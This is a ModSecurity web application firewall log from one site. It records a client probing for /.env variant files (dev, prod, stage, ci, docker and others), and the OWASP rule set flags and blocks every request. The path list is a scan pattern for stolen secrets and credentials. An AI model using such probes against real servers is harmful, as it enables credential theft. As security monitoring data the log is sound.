[Mon May 11 16:33:25.134920 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.dev"] [unique_id "agHotUWKUxpmnkK7zHx_CwAAAQs"]
[Mon May 11 16:33:25.135305 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.dev"] [unique_id "agHotUWKUxpmnkK7zHx_CwAAAQs"]
[Mon May 11 16:33:25.135499 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.dev"] [unique_id "agHotUWKUxpmnkK7zHx_CwAAAQs"]
[Mon May 11 16:33:25.135743 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.dev"] [unique_id "agHotUWKUxpmnkK7zHx_CwAAAQs"]
[Mon May 11 16:33:25.291915 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.prod"] [unique_id "agHotUWKUxpmnkK7zHx_DAAAAQs"]
[Mon May 11 16:33:25.292326 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.prod"] [unique_id "agHotUWKUxpmnkK7zHx_DAAAAQs"]
[Mon May 11 16:33:25.292517 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.prod"] [unique_id "agHotUWKUxpmnkK7zHx_DAAAAQs"]
[Mon May 11 16:33:25.292747 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.prod"] [unique_id "agHotUWKUxpmnkK7zHx_DAAAAQs"]
[Mon May 11 16:33:25.448546 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.stage"] [unique_id "agHotUWKUxpmnkK7zHx_DQAAAQs"]
[Mon May 11 16:33:25.448877 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.stage"] [unique_id "agHotUWKUxpmnkK7zHx_DQAAAQs"]
[Mon May 11 16:33:25.449045 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.stage"] [unique_id "agHotUWKUxpmnkK7zHx_DQAAAQs"]
[Mon May 11 16:33:25.449272 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.stage"] [unique_id "agHotUWKUxpmnkK7zHx_DQAAAQs"]
[Mon May 11 16:33:25.608976 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.ci"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.ci"] [unique_id "agHotUWKUxpmnkK7zHx_DwAAAQs"]
[Mon May 11 16:33:25.609356 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.ci"] [unique_id "agHotUWKUxpmnkK7zHx_DwAAAQs"]
[Mon May 11 16:33:25.609539 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.ci"] [unique_id "agHotUWKUxpmnkK7zHx_DwAAAQs"]
[Mon May 11 16:33:25.609751 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.ci"] [unique_id "agHotUWKUxpmnkK7zHx_DwAAAQs"]
[Mon May 11 16:33:25.766022 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.docker"] [unique_id "agHotUWKUxpmnkK7zHx_EAAAAQs"]
[Mon May 11 16:33:25.766425 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.docker"] [unique_id "agHotUWKUxpmnkK7zHx_EAAAAQs"]
[Mon May 11 16:33:25.766616 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.docker"] [unique_id "agHotUWKUxpmnkK7zHx_EAAAAQs"]
[Mon May 11 16:33:25.766836 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.docker"] [unique_id "agHotUWKUxpmnkK7zHx_EAAAAQs"]
[Mon May 11 16:33:25.922702 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.live"] [unique_id "agHotUWKUxpmnkK7zHx_EQAAAQs"]
[Mon May 11 16:33:25.923053 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.live"] [unique_id "agHotUWKUxpmnkK7zHx_EQAAAQs"]
[Mon May 11 16:33:25.923247 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.live"] [unique_id "agHotUWKUxpmnkK7zHx_EQAAAQs"]
[Mon May 11 16:33:25.923473 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.live"] [unique_id "agHotUWKUxpmnkK7zHx_EQAAAQs"]
[Mon May 11 16:33:26.079933 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.preprod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.preprod"] [unique_id "agHotkWKUxpmnkK7zHx_EgAAAQs"]
[Mon May 11 16:33:26.080333 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.preprod"] [unique_id "agHotkWKUxpmnkK7zHx_EgAAAQs"]
[Mon May 11 16:33:26.080524 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.preprod"] [unique_id "agHotkWKUxpmnkK7zHx_EgAAAQs"]
[Mon May 11 16:33:26.080759 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.preprod"] [unique_id "agHotkWKUxpmnkK7zHx_EgAAAQs"]
[Mon May 11 16:33:26.238002 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.uat"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.uat"] [unique_id "agHotkWKUxpmnkK7zHx_EwAAAQs"]
[Mon May 11 16:33:26.238377 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.uat"] [unique_id "agHotkWKUxpmnkK7zHx_EwAAAQs"]
[Mon May 11 16:33:26.238561 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.uat"] [unique_id "agHotkWKUxpmnkK7zHx_EwAAAQs"]
[Mon May 11 16:33:26.238788 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.uat"] [unique_id "agHotkWKUxpmnkK7zHx_EwAAAQs"]
[Mon May 11 16:33:26.396059 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.dist"] [unique_id "agHotkWKUxpmnkK7zHx_FAAAAQs"]
[Mon May 11 16:33:26.396475 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.dist"] [unique_id "agHotkWKUxpmnkK7zHx_FAAAAQs"]
[Mon May 11 16:33:26.396674 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.dist"] [unique_id "agHotkWKUxpmnkK7zHx_FAAAAQs"]
[Mon May 11 16:33:26.396906 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.dist"] [unique_id "agHotkWKUxpmnkK7zHx_FAAAAQs"]
